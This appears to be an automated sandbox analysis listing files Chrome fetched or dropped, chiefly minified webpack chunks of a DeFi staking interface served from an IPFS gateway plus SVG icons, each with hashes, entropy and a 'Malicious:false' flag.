                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[102],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=a},96875:function(e,n,t){t.d(n,{o:function(){return j}});var r=t(59499),o=t(4730),i=t(49501),a=t(1279),s=t(62097),c=t(30120),l=t(29630),d=t(75084),u=t(70794),x=t(41024),p=t(85893),m=["value","onInfoClick","HALIntegrationComponent"];function f(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable})))
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4254), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                                                                                                  Entropy (8bit):5.567365538036847
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ib71BNSelDmQUwohXsE1s4ZxrK/ZKvQQnuF9FU5CspIulDVy0ZpoIScHFB1P8DUr:0SelSJwS5M/ZKj95DptokoA07wgjVe5n
                                                                                                                                                                                                                                                  MD5:D89E32DA8C25A7900998E9F78A477C62
                                                                                                                                                                                                                                                  SHA1:04B350CA6D25526A95BDBF6F067FD091FCD451B2
                                                                                                                                                                                                                                                  SHA-256:4A90B901C48DBA63AE44E5541F49704B21B3D5DE6EA1611EA6F4F8150BEDFA6C
                                                                                                                                                                                                                                                  SHA-512:EDD59CD9E2115E18BE5BEAE59B39DE208D9810457125D080468F2056652F67FBB244F40E450DD9174A7DB04F9A790C73980C21A4C9FDF4B7300BDB698B21BD51
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8345],{58345:function(e,t,n){n.r(t),n.d(t,{StakeRewardClaimRestakeModal:function(){return U}});var r=n(67294),o=n(8195),a=n(31959),s=n(49501),i=n(75331),c=n(1279),l=n(29630),u=n(54401),d=n(77912),m=n(60265),v=n(77537),k=n(78371),p=n(84568),x=n(63206),b=n(53601),f=n(63491),j=n(67916),N=n(93608),g=n(57824),y=n(78944),O=n(10343),A=n(59499),h=n(50029),w=n(4730),T=n(87794),C=n.n(T),E=n(89291),S=n(67489),R=n(85893),P=["amountToClaim","isWrongNetwork","sx","symbol","blocked","selectedToken"];function _(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var I,D=function(e){var t=e.amountToClaim,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,l=(0,w.Z)(e,P),u=(0,k.Y)((function(e){return e.claimRewardsAndStake})),d=(0,E.Q)({tryPermit:!1,handleGetTxns:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4768), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4768
                                                                                                                                                                                                                                                  Entropy (8bit):5.531953924670438
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:3a2DXHcwlin8kmlWFxiK97RFuPukdIZS0meUfvQYJxuRMUNmLRSfsxFMuBugtOgf:zDswlwLFxiKbF6VdISr4YJxIL8LRQsxz
                                                                                                                                                                                                                                                  MD5:DC166250138041181DE591E21AA7192A
                                                                                                                                                                                                                                                  SHA1:C4A8A2A91FFC7BB0E31C0E1A77D23E620D679664
                                                                                                                                                                                                                                                  SHA-256:117970265C5AFD32CB55CF648A87AA89AFB4F6D23EB6F8F2691DA508BC208AA8
                                                                                                                                                                                                                                                  SHA-512:E71725052E86E1BA8ACDBC408C5BC6CBE5C96D3C24DBE4A6ED63C9C6FF425D81BE979417A8C925E6EF31F65B0DA527EB98AA7B981FFF8FBC8A42FCBA8B113A66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9388],{89388:function(e,t,n){n.r(t),n.d(t,{StakeModal:function(){return G}});var r=n(67294),o=n(8195),a=n(31959),i=n(49501),s=n(75331),c=n(1279),u=n(29630),l=n(77912),d=n(60265),p=n(77537),m=n(78371),v=n(84568),k=n(63206),x=n(57609),f=n(54401),b=n(53601),g=n(63491),h=n(67916),j=n(93608),y=n(57824),N=n(78944),T=n(10343),O=n(59499),S=n(50029),A=n(4730),w=n(87794),E=n.n(w),P=n(89291),C=n(67489),_=n(85893),I=["amountToStake","isWrongNetwork","sx","symbol","blocked","selectedToken","event"];function D(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var U,W=function(e){var t=e.amountToStake,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,u=(e.event,(0,A.Z)(e,I)),l=(0,m.Y)(),d=l.stake,p=l.stakeWithPermit,v=c!==s.hj.bpt,k=(0,P.Q)({tryPermit:v,per
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15252), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15252
                                                                                                                                                                                                                                                  Entropy (8bit):5.474899566567033
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:E7ibegv0VRKGayRI7OzFxQg1LWOBEAVyQGQYGbYsieX:E7hlI7Oz1j+QPYGbFX
                                                                                                                                                                                                                                                  MD5:76F49210C60C9D60C710E152F41CB7D8
                                                                                                                                                                                                                                                  SHA1:853FFDFF1737BDEC7F0AF816EF8A575824A5AC1A
                                                                                                                                                                                                                                                  SHA-256:5E073964E4BC63E1D81BEB8DB000BBC0CAD7827D1DFAE8BDEA0C6FBB1B20A7E8
                                                                                                                                                                                                                                                  SHA-512:548AD0E2CCD4F4517AFADE323DBD95A7206E6317EC0B7F94D3AD3A60BA4D2F66E88444212E1218258C5346D0073161E346BA5FC052003B52BC45C6F4BE43EC76
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6504],{89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),s=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function m(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const f=["baseClassName","className","color","component","fontSize"],v=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,u.Z)(r.color)}`],t[`fontSize${(0,u.Z)(r.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):85086
                                                                                                                                                                                                                                                  Entropy (8bit):5.283227041512326
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:27psBNl+rm1CE7MWnzGVirQMq1rgq6LMEvA:lBT+rmJyeQMerZaA
                                                                                                                                                                                                                                                  MD5:87B532C88E0A0E2A394DA9D3BEAB5CE6
                                                                                                                                                                                                                                                  SHA1:4159C039BBF2D0659A39CD3DDAF7D6DC3F3981E7
                                                                                                                                                                                                                                                  SHA-256:00382EBCBCCEE5EDE71F8D6D644D26B47C76CEA454B329D523A61F70B95850C9
                                                                                                                                                                                                                                                  SHA-512:BAE77661FBDDC7B7579D950426AF5589374C3C201C20FB8EE381728B64B124EE66C7E0D6AC579AC81753502AB9040DDAD589D188B135CC82E68C5DD06C33B4D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/main-37e08f82b0681cde.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{63133:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){var e=null;return{mountedInstances:new Set,updateHead:function(t){var r=e=Promise.resolve().then((function(){if(r===e){e=null;var a={};t.forEach((function(e){if("link"===e.type&&e.props["data-optimized-fonts"]){if(document.querySelector('style[data-href="'.concat(e.props["data-href"],'"]')))return;e.props.href=e.props["data-href"],e.props["data-href"]=void 0}var t=a[e.type]||[];t.push(e),a[e.type]=t}));var i=a.title?a.title[0]:null,u="";if(i){var c=i.props.children;u="string"===typeof c?c:Array.isArray(c)?c.join(""):""}u!==document.title&&(document.title=u),["meta","base","link","style","script"].forEach((function(e){!function(e,t){var r=document.getElementsByTagName("head")[0],a=r.querySelector("meta[name=next-head-count]");0;for(var i=Number(a.content),u=[],c=0,s=a.previousElementSibling;c<i;c++,s=(null===s||void 0===s?v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4246
                                                                                                                                                                                                                                                  Entropy (8bit):4.103696787604314
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:K9F4GfkbfNyN48/E8jfsrKk1Z/eO4oSgT3I/VcbQokvBD:KnqbfQ48/BfsrKYZ/eOBe9FJD
                                                                                                                                                                                                                                                  MD5:DDA77F765068E4450D3545A40B777663
                                                                                                                                                                                                                                                  SHA1:63AE45EF489734D09D3AEA98E016C0DD1BC733F9
                                                                                                                                                                                                                                                  SHA-256:A644A9364BE96AD0A72F8E24397322B4D0646563A11E8FF76191A9239A561AC9
                                                                                                                                                                                                                                                  SHA-512:D88521109D4AC8EA200F644973A7A554C1A6B8E0AE4658C7F0E3FAFBEE40A1CB8A6A75BECB2A49AE3B8D226BEE36CD8CA63B492FABC2BF034D6A295349567946
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/0e5029fd9cd4812b6712.svg
                                                                                                                                                                                                                                                  Preview:<svg width="124" height="24" viewBox="0 0 124 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)" fill="#fff"><path d="M26.242 2.01A25.218 25.218 0 0 0 19.851 0a18.718 18.718 0 0 0-.819 1.701 23.45 23.45 0 0 0-7.083 0A18.2 18.2 0 0 0 11.121 0a25.13 25.13 0 0 0-6.396 2.015C.68 8.132-.417 14.097.132 19.978c2.682 2.005 5.282 3.223 7.838 4.02A19.514 19.514 0 0 0 9.65 21.23a16.507 16.507 0 0 1-2.644-1.287c.222-.165.439-.337.648-.513 5.098 2.386 10.636 2.386 15.673 0 .211.177.428.348.648.513-.839.505-1.726.939-2.649 1.29A19.432 19.432 0 0 0 23.004 24c2.558-.797 5.16-2.015 7.843-4.022.643-6.817-1.099-12.728-4.605-17.968ZM10.343 16.361c-1.53 0-2.785-1.43-2.785-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174.003 1.74-1.228 3.17-2.785 3.17Zm10.293 0c-1.53 0-2.786-1.43-2.786-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174 0 1.74-1.228 3.17-2.785 3.17ZM41.629 6.122h6.652c1.603 0 2.958.257 4.069.767 1.109.51 1.94 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9409), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9409
                                                                                                                                                                                                                                                  Entropy (8bit):5.353629589621163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:1bx8Tv4FjvU38boY/fueb+lcHLKgUDagy1LmH7x5NOoY81to:1bgojvmWqU+EKtDa71Kbso7w
                                                                                                                                                                                                                                                  MD5:66209AC8267B3487FA17882D711FE99B
                                                                                                                                                                                                                                                  SHA1:94AAD8486E7C50B3B1A99F276721D89F2CD0B752
                                                                                                                                                                                                                                                  SHA-256:703AB1B4CA92F8EF672D5A42B7C1FF8082DE83294A20BB9098828D6E2B8E8A41
                                                                                                                                                                                                                                                  SHA-512:B62C7CCCBD3928076F94D116E89CAEF3EB4F04FE4BA6E5A57C303A8C8771F1B407E8E32D955553E1C606B0E8BE13A36C42D3BF19D93C0271788A0DD608D8D140
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4609],{89722:function(e,t,n){"use strict";n.d(t,{Z:function(){return b}});var r=n(87462),o=n(63366),i=n(67294),s=n(86010),a=n(94780),c=n(81719),l=n(78884),u=n(36622),f=n(34867);function p(e){return(0,f.Z)("MuiIcon",e)}(0,n(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=n(85893);const v=["baseClassName","className","color","component","fontSize"],m=(0,c.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,"inherit"!==n.color&&t[`color${(0,u.Z)(n.color)}`],t[`fontSize${(0,u.Z)(n.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):304311
                                                                                                                                                                                                                                                  Entropy (8bit):5.593591529252644
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:6/4jmjvNOTspdESuhK6uIB2FcIF9Cia1F:iWOOTspdEXhK5IB2FcIF9P0F
                                                                                                                                                                                                                                                  MD5:42AAA57C0704E5D97327AF6F8D0CDC49
                                                                                                                                                                                                                                                  SHA1:3B956D02384A6080489BA34995F5EC4101DB2155
                                                                                                                                                                                                                                                  SHA-256:F1180446B881D08E9075F7EAB29AFE1E8FDA1591DAC1BFDE09A9C4E6EE4ACA55
                                                                                                                                                                                                                                                  SHA-512:58AD8358FC45982BB1ADDBFEB37137B818846402CA2BABC537ED2F86451AA763772114D7E75A946C8655598457EDF9C4F4054B2C6E6F1B1DCBE7C2F75BF650EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8806],{25563:function(e,s,o){"use strict";o.d(s,{hu:function(){return k},gO:function(){return R},tF:function(){return U}});var a=o(59499),n=o(49501),d=o(61782),t=o(30120),c=o(72389),i=o(62097),r=o(61225),m=o(82334),b=o(81645),l=o(29630),g=o(31538),A=o(61702),f=o(67294),x=o(78371),h=o(57609),C=o(46930),F=o(63206),D=o(34637),E=o(59379),I=o(85893);function p(e,s){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);s&&(a=a.filter((function(s){return Object.getOwnPropertyDescriptor(e,s).enumerable}))),o.push.apply(o,a)}return o}function u(e){for(var s=1;s<arguments.length;s++){var o=null!=arguments[s]?arguments[s]:{};s%2?p(Object(o),!0).forEach((function(s){(0,a.Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):p(Object(o)).forEach((function(s){Object.defineProperty(e,s,Object.getOwnPropertyDescriptor(o,s))}))}return e}var B,k=functio
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11336), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11336
                                                                                                                                                                                                                                                  Entropy (8bit):5.323901341605146
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:es43RJtGlxc5KmsckCNjNk6ZkXFX+nrhwx0iFY1YlnG00e6e1cw:Q3R2S5K7OjNk6eFunrSX+m10e6Pw
                                                                                                                                                                                                                                                  MD5:91FCCEFC49CB6B6072426A010C0E7B76
                                                                                                                                                                                                                                                  SHA1:E45150F2500BCF4DBE419A20E825797A6D10C3F7
                                                                                                                                                                                                                                                  SHA-256:9DFDF112A3462C103A1124E0EB4D31671E97694BC9CA26789FDAFB05AD86E816
                                                                                                                                                                                                                                                  SHA-512:CD718675728C6177B0CFA75ABAFB216530BA019937BC3CA4833E86647A32728CC7BFDC4FA5331967056A79B142AED805C221F6C4EC2CA403F6BD0BD8B6EA1D66
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/5315-ede49da3c729b6f5.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5315],{12349:function(e,n,t){t.d(n,{M:function(){return v}});var r=t(1279),i=t(80059),o=t(30120),c=t(29630),s=t(81645),a=t(67294),l=t(78371),d=t(57609),p=t(97563),x=t(41024),u=t(72667),f=t(49501),j=t(92391),y=t(85893),b=function(e){var n=e.incentives,t=e.incentivesNetAPR,r=e.symbol,i="secondary12",s=function(e){var n=e.incentiveAPR;return(0,y.jsx)(o.Z,{sx:{display:"inline-flex",alignItems:"center"},children:"Infinity"!==n?(0,y.jsxs)(y.Fragment,{children:[(0,y.jsx)(x.B,{value:+n,percent:!0,variant:i}),(0,y.jsx)(c.Z,{variant:i,sx:{ml:1},children:(0,y.jsx)(f.cC,{id:"APR"})})]}):(0,y.jsxs)(y.Fragment,{children:[(0,y.jsx)(c.Z,{variant:i,children:"\u221e %"}),(0,y.jsx)(c.Z,{variant:i,sx:{ml:1},children:(0,y.jsx)(f.cC,{id:"APR"})})]})})};return(0,y.jsxs)(o.Z,{sx:{display:"flex",justifyContent:"center",alignItems:"center",flexDirection:"column"},children:[(0,y.jsx)(c.Z,{variant:"caption",color:"text.secondary",mb:3,children:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                                                  Entropy (8bit):5.114377432261608
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tcGcAumc4slmyHSORZQqFbxTmSqgBqDc4:tcGtuIyHjRZQq5sLgBqA4
                                                                                                                                                                                                                                                  MD5:CF35F935EE29ECDC14E56FAD3F87DF16
                                                                                                                                                                                                                                                  SHA1:6EE303DF7BA5468930E37DA8C09E6CBCC3CC9748
                                                                                                                                                                                                                                                  SHA-256:6CF85DA54D4C554DA07B2AEC6F0DF29603D8D28A102ED4E17DCE99A7D7D79B9A
                                                                                                                                                                                                                                                  SHA-512:EC1F0F369B42BEB670B253CFD5AD9D4C15C2DBED08C8804B2C73F19DEE0C561F2EF19D245EDFD999D6166699E04A94D72A8260BD33AD3FEBE699B14EE31889AA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/flags/fr.svg
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M20.099-1.378H-.099V15.38H20.1V-1.379Z" fill="#ED2939"/><path d="M13.367-1.378H-.1V15.38h13.466V-1.379Z" fill="#fff"/><path d="M6.633-1.378H-.099V15.38h6.732V-1.379Z" fill="#002395"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):180
                                                                                                                                                                                                                                                  Entropy (8bit):4.921485085907038
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+ZacvTnARcLnkDmJS4RKb5KVErcHYWNTWi7eLFOyTIXGUNfHFQJJqGrqL0:t6AbZ/Ikn4mc4slmYWBWzLRI2ylQJAe
                                                                                                                                                                                                                                                  MD5:B1D4C5E276E3AAA8EC41E6014DD572B2
                                                                                                                                                                                                                                                  SHA1:B5B63A8B35223277D75C79B2AABD8221FDA383EB
                                                                                                                                                                                                                                                  SHA-256:7CF5996F7AB483BD985B3DE5BFBCF50A2B22A7B473E8011E5C993D9830AF9D12
                                                                                                                                                                                                                                                  SHA-512:8E4C954D96FBDA407E87FA65859FE758FC83F2DA0C6D7C07824926BFB0BCDF4F40DE057C5DD1D7EE0890C5287D2ED2EC8FDEFBDF317B46FE222339894E0A559B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29934), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):29934
                                                                                                                                                                                                                                                  Entropy (8bit):5.548164506514609
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:eyPkWVecfOr8Bm4ehCsyFMc1mrl21RMJLinho:zeTrIehCEc+ooz
                                                                                                                                                                                                                                                  MD5:BD8AB992C5A41B157AF110BC463F3900
                                                                                                                                                                                                                                                  SHA1:6EE8EBA24A412F41C536AB6C2B640C004BA2CFC6
                                                                                                                                                                                                                                                  SHA-256:C9ADB307C1A0ED98C19FE20D9BD667B0E968DEBAE2CA6DE4D60FE4988C2F2F6B
                                                                                                                                                                                                                                                  SHA-512:E67E77AA40AB883A1CAA8B3A55B87DD378B4D8785BDCC722267C737949DC42D97BC8AE2E782DF57CD4ADB2190594998F9C62D0AD988E48A44C984B1FDFB0893A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[425],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14048), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14048
                                                                                                                                                                                                                                                  Entropy (8bit):5.544747292523965
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:KyPmhhzGy99RQdVeiHXerPdLUvmuoo1bF1pH59jvN/zCQ:KyPSzG2uVecXWqowtHfvVzCQ
                                                                                                                                                                                                                                                  MD5:0E9FAB8B656DFDF601D82A2762A4C22F
                                                                                                                                                                                                                                                  SHA1:AB850DE7A831A2F9451A49A1779B59C17E807CAC
                                                                                                                                                                                                                                                  SHA-256:860C5B05BCE38AE059DB59CB69E3AAAB653483B582CDD369FCA7E3E21F7A9B50
                                                                                                                                                                                                                                                  SHA-512:C49B704D30783F51F3340E12A6B5BD8E8D21A3D056F9F42D9EC821189E70936A4846A3BF3E010D5E30DC2194323A2D219432006BFBB903A23B595364137D5895
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[652],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),i=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},9144:function(e,t,r){var n=r(63366),o=r(87462),s=r(67294),i=r(95408),c=r(98700),a=r(39707),l=r(59766),u=r(81719),d=r(78884),p=r(85893);const x=["component","direction","spacing","divider","children"];function f(e,t){const r=s.Children.toArray(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(s.cloneElement(t,{key:`separator-${o}`})),e)),[])}const m=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",o
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7220), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7220
                                                                                                                                                                                                                                                  Entropy (8bit):5.361627992381026
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Zf30aQNTbM9JT3Zw79oM8MTNT2ma/HM0U8VxSN1s:ZHUTbM9JTOpxC/sJ8Vxs1s
